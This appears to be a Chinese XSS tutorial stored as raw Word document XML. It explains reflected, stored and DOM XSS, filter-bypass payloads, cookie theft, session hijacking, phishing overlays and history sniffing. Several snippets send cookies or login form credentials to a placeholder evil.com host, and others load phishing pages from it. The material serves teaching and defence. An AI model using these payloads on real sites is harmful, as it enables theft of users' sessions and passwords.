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XSS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一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.XSS的种类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(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反射型XSS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如果一个WEB应用程序使用动态页面传递参数向用户显示错误信息，就有可能会造成一种常见的XSS漏洞。一般情况下，这种页面使用一个包含消息文本的参数，并在页面加载时将文本返回给用户。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例如，通过程序参数输出传递的参数到HTML页面，则打开下面的网址将会返回一个消息提示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="42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"http://fovweb.com/xss/message.php?send=Hello,World!" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://fovweb.com/xss/message.php?send=Hello,World!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>输出内容：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Hello,World!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr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在原程序的URL的参数为，替换为我们用来测试的代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://fovweb.com/xss/message.php?send=&lt;script&gt;alert(‘xss’)&lt;/script&gt;" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://fovweb.com/xss/message.php?send=&lt;script&gt;alert(‘xss’)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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页面输出内容则为：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&lt;script&gt;alert(‘xss’)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr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当用户在用户浏览器打开的时，将会弹出提示消息。由于这种漏洞需要发送一个包含了嵌入式JavaScript代码的请求，随后这些代码被反射给了发出请求的用户，因此被称为反射型XSS。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(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存储型XSS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存储型跨站可以将XSS语句直接写入到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"http://www.2cto.com/database/" \t "http://www.2cto.com/article/201601/_blank"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 w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库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中，因而相比反射型跨站的利用价值要更大。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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里提供了一个类型留言本的页面。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21200" cy="142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这里在Message框输入跨站语句“alert('hi')”，以后任何人只要访问这个留言页面，就可以触发跨站语句，实现弹框。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(3)DOM XSS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DOM XSS是基于在js上的。而且他不需要与服务端进行交互，像反射、存储都需要服务端的反馈来构造xss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客户端的脚本程序可以通过DOM来动态修改页面内容，可能触发DOM型XSS的属性：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document.referer属性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window.name属性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location属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C00000"/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innerHTML属性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color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>documen.write属性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sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>二．常见的绕过WAF（Web应用防火墙）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(1)利用html标签的属性值执行XSS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很多html标记中的属性支持Javascript:[code]伪协议的形式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(href,background,value,action等)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href="javascript:alert('XSS');"&gt;aa&lt;/a&gt;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(2)空格回车TAB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利用空格，回车和TAB键绕过限制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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ript:alert(‘XSS’);”&gt;aa&lt;/a&gt;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ript:alert(‘XSS’);”&gt;aa&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000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(3)对标签属性值进行转码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ascii码编码&amp;#[十进制](&amp;#9==&gt;TAB,&amp;#10==&gt;换行符,&amp;#13==&gt;回车符)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&amp;#x[16进制](&amp;#x9==&gt;TAB,&amp;#xa==&gt;换行符,&amp;#xd==&gt;回车符)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&lt;a href=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>javascript:alert(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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href=”javascrip&amp;#116&amp;#58alert(‘XSS’);”&gt;aa&lt;/a&gt;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(4)产生自己的事件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&lt;img src=”#” onerror=”alert(‘XSS’)”/&gt;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(5)利用css跨站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&lt;div style=”width:expression(alert(‘XSS’));”&gt;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&lt;style&gt;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body{background-image:expression(alert(‘XSS’));}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&lt;/style&gt;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&lt;link rel=”stylesheet” href=”http://www.evil.com/attack.css”&gt;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&lt;style&gt;@import url(http://www.evil.com/attack.css);&lt;/style&gt;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(6)扰乱过滤规则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href=”javascript:alert(0);”&gt;aa&lt;/a&gt;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HREF=”javaScRipt:alert(0);”&gt;aa&lt;/A&gt; 大小写混淆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href=javascript:alert(0);&gt;aa&lt;/a&gt;不用引号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&lt;a/href=”javascript:alert(0);”&gt;aa&lt;/a&gt; /代替空格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href=”javas/**/cript:alert(0);”&gt;aa&lt;/a&gt;/**/会被忽略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(7)拆分跨站法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把跨站代码分成几个片段，然后再使用某种方式将其拼凑在一起执行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标题一:&lt;script&gt;z=’&lt;script src=’;/*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标题二:*/z+=’http://www.test.c’;/*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标题三:*/z+=’n/1.js&gt;&lt;\/scirpt&gt;’;/*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标题四:*/document.write(z)&lt;/script&gt;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href=”#”&gt;&lt;script&gt;z=’&lt;script src=’;/*&lt;/a&gt;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href=”#”&gt;*/z+=’http://www.test.c’;/*&lt;/a&gt;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href=”#”&gt;*/z+=’n/1.js&gt;&lt;\/scirpt&gt;’;/*&lt;/a&gt;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&lt;a href=”#”&gt;*/document.write(z)&lt;/script&gt;&lt;/a&gt;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&lt;===&gt;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z=’&lt;script src=http://www.test.cn/1.js&gt;&lt;/script&gt;’;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document.write(z);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三．cookie欺骗（cookie回话攻击）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获取cookie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document.cookie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设置cookie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document.cookie=’cookieName=cookieValue;expirationData;path’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Domain ---------- 设置关联cookie的域名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Expires ----------- 过期时间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HttpOnly ---------- 禁止JavaScript读取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Path ------------- 关联到cookie的路径，默认为 /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Secure ----------- 指定cookie需要通过https传递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保存在本地的cookie通常是某种验证信息（用户名与密码），虽然经过加密的，但窃取的cookie向某个指定服务器提交且能成功通过验证，叫做cookie欺骗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xss脚本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document.location=”http://www.evil.com/cookie.asp?cookie=”+document.cookie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&lt;img src =”http://www.evil.com/cookie.asp?cookie=”+document.cookie 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New Image().src=”http://www.evil.com/cookie.asp?cookie=”+document.cookie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当无法获取cookie（httpcookie），则直接获取用户名与密码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Form=document.forms[“userslogin”];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Form.onsubmit=function(){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iframe=document.createElement(“iframe”);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iframe.style.display=”none”;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iframe.src=”http://www.evil.com/get.php?user=”+Form.user.value+”&amp;pass”+Form.pass.value;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document.body.appendChild(iframe);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四．会话劫持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指攻击者利用xss劫持了用户的会话（sessionid）去执行某些恶意操作（或攻击），这些操作往往能达到提升权限的作用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五．网络钓鱼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xss跨站脚本最大特性是能够在网页中插入并运行JavaScript，不仅能劫持用户当前会话，同时还能控制浏览器的部分行为，这种基于xss的钓鱼技术被称为xss phishing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(1)构建钓鱼链接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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.bug.com/index.php?s=&lt;script" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://www.bug.com/index.php?s=&lt;script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> src=”http://www.evil.com/xss.js”&gt;&lt;/script&gt;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xss.js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document.body.innerHTML={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‘&lt;div style=”position:absolute;top:0px;left:0px;width:100%;height:100%;”&gt;’+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‘&lt;iframe src=”http://www.evil.com/phishing.html” width=100% height=100% /&gt;’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(2)复制并修改登录页面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&lt;form method=”post” action=”http://www.evil.com/get.php”&gt;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type=”text” name=”username” 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type=”password” name=”password”/&gt;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&lt;input type=”submit” name=”login” value=”submit”/&gt;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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>get.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取用户名与密码，并重定向到正确的页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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1"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>六．xss history hacking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利用链接样式与getComputedStyle()技术。来获取用户访问过的链接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a:link{color:#FF0000}    //未访问的链接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a:hover{color:#FF00FF}  //光标悬停在链接上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a:active{color:#0000FF}  //被选择的链接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a:visited{color:#00FF00}  //已访问的链接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getComputedStyle是一个可以获取当前元素所有最终使用的CSS属性值。返回的是一个CSS样式声明对象([object CSSStyleDeclaration])。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getComputedStyle("元素", "伪类");第二个参数“伪类”（如果不是伪类，设置为null）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getPropertyValue方法可以获取CSS样式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>声</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>明对象([object CSSStyleDeclaration])上的属性值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;    getProopertyValue(‘属性值’)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&lt;ul id=”visited”&gt;&lt;/ul&gt;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&lt;ul id=”notVisited”&gt;&lt;/ul&gt;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&lt;script&gt;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website={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“www.qq.com”,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“www.baidu.com”,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“www.163.com”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};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for(var i=0;i&lt;website.length;i++){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link=document.createElement(“a”);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link.id=”id”+i;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link.href=website[i];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link.innerHTML=website[i];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document.write(“&lt;style&gt;”);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document.write(“#id”+i+”:visited{color:#FF0000}”);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document.write(”&lt;/style&gt;”);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document.body.appendChild(link);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color=document.defaultView.getComputedStyle(link,null).getPropertyValue(“color”);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document.body.removeChild(link);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var item=document.createElement(“li”);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item.appendChild(link);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if(color==”rgb(255,0,0)”){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="84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document.getElementById(‘visited’).appendChild(item);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}else{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="84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document.getElementById(‘notVisited’).appendChild(item);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0"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ind w:firstLine="420" w:firstLineChars="0"/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}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;/script&gt;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七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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>常见的编码方法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URL编码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URL只允许用US-ASCII字符集中可打印的字符(0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>20—0x7x)，其中某些字符在HTTP协议里有特殊的意义，所以有些也不能使用。这里有个需要注意的，+加号代表URL编码的空格，%20也是。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URL编码最长见的是在用GET/POST传输时，顺序是把字符改成%+ASCII两位十六进制(先把字符串转成ASCII编码，然后再转成十六进制)。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 unicode编码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Unicode有1114112个码位，也就是说可以分配1114112个字符。Unicode编码的字符以%u为前缀，后面是这个字符的十六进制unicode的码点。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code编码之所以被本文提到，因为有的站点过滤了某些字符串的话，但是发现这个站点在后端验证字符串的时候，识别unicode编码，那我们就可以把我们的攻击代码来改成unicode编码形式，就可以绕过站点的过滤机制了。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HTML编码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HTML编码的存在就是让他在代码中和显示中分开， 避免错误。他的命名实体：构造是&amp;加上希腊字母，字符编码：构造是&amp;#加十进制、十六进制ASCII码或unicode字符编码，而且浏览器解析的时候会先把html编码解析再进行渲染。但是有个前提就是必须要在“值”里，比如属性src里，但却不能对src进行html编码。不然浏览器无法正常的渲染。</w:t>
      </w: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例如：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default"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;img src=&amp;#108;&amp;#111;&amp;#103;&amp;#111;&amp;#46;&amp;#112;&amp;#110;&amp;#103;/&gt;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可以正常显示。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但是当你把src或者img进行html编码就不行了，例如：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&lt;img &amp;#115;&amp;#114;&amp;#99;=&amp;#108;&amp;#111;&amp;#103;&amp;#111;&amp;#46;&amp;#112;&amp;#110;&amp;#103;/&gt;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DejaVu Math TeX Gyre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F1F39"/>
    <w:rsid w:val="058704F2"/>
    <w:rsid w:val="1BD9AED2"/>
    <w:rsid w:val="274F176A"/>
    <w:rsid w:val="313F1F39"/>
    <w:rsid w:val="37D77A76"/>
    <w:rsid w:val="3AFF693A"/>
    <w:rsid w:val="3BD77DA1"/>
    <w:rsid w:val="3DDAB28E"/>
    <w:rsid w:val="3E0E6DEE"/>
    <w:rsid w:val="43FE50E4"/>
    <w:rsid w:val="4F5F6FDE"/>
    <w:rsid w:val="4FEFB3C5"/>
    <w:rsid w:val="507C14D7"/>
    <w:rsid w:val="533EB98E"/>
    <w:rsid w:val="543D75FF"/>
    <w:rsid w:val="5B6F49A6"/>
    <w:rsid w:val="5DC6C709"/>
    <w:rsid w:val="5E66D3C3"/>
    <w:rsid w:val="611D6AB8"/>
    <w:rsid w:val="6DFFC427"/>
    <w:rsid w:val="6F779B95"/>
    <w:rsid w:val="6FF2CC11"/>
    <w:rsid w:val="72E8EE26"/>
    <w:rsid w:val="737A09F1"/>
    <w:rsid w:val="75EF26D8"/>
    <w:rsid w:val="773DDA36"/>
    <w:rsid w:val="783A14C7"/>
    <w:rsid w:val="7A9F40B2"/>
    <w:rsid w:val="7BFF3A96"/>
    <w:rsid w:val="7DB29C7F"/>
    <w:rsid w:val="7E636B82"/>
    <w:rsid w:val="7E6FA92C"/>
    <w:rsid w:val="7FBF022A"/>
    <w:rsid w:val="7FFB728D"/>
    <w:rsid w:val="9EAF81D0"/>
    <w:rsid w:val="9F4F21BE"/>
    <w:rsid w:val="9FFCD65C"/>
    <w:rsid w:val="AA2FEC1E"/>
    <w:rsid w:val="BBBBB474"/>
    <w:rsid w:val="BEFFE501"/>
    <w:rsid w:val="C5FEAF72"/>
    <w:rsid w:val="D3FD7E6E"/>
    <w:rsid w:val="DAE6BC09"/>
    <w:rsid w:val="DB8FABA5"/>
    <w:rsid w:val="DFB747CA"/>
    <w:rsid w:val="DFDD0EB9"/>
    <w:rsid w:val="DFFAB575"/>
    <w:rsid w:val="EFFF6A31"/>
    <w:rsid w:val="F6B71D22"/>
    <w:rsid w:val="F9EB33B7"/>
    <w:rsid w:val="FB9FA3E4"/>
    <w:rsid w:val="FBDF0F41"/>
    <w:rsid w:val="FDBB6B29"/>
    <w:rsid w:val="FDFA2358"/>
    <w:rsid w:val="FEF79178"/>
    <w:rsid w:val="FEFDB1F9"/>
    <w:rsid w:val="FFABD5DF"/>
    <w:rsid w:val="FFBCE48F"/>
    <w:rsid w:val="FFD33306"/>
    <w:rsid w:val="FFF56433"/>
    <w:rsid w:val="FFFE4197"/>
    <w:rsid w:val="FFFF9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2017-04-07T10:49:00Z</dcterms:created>
  <dc:creator>wu</dc:creator>
  <cp:lastModifiedBy>wu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-03T21:43:59Z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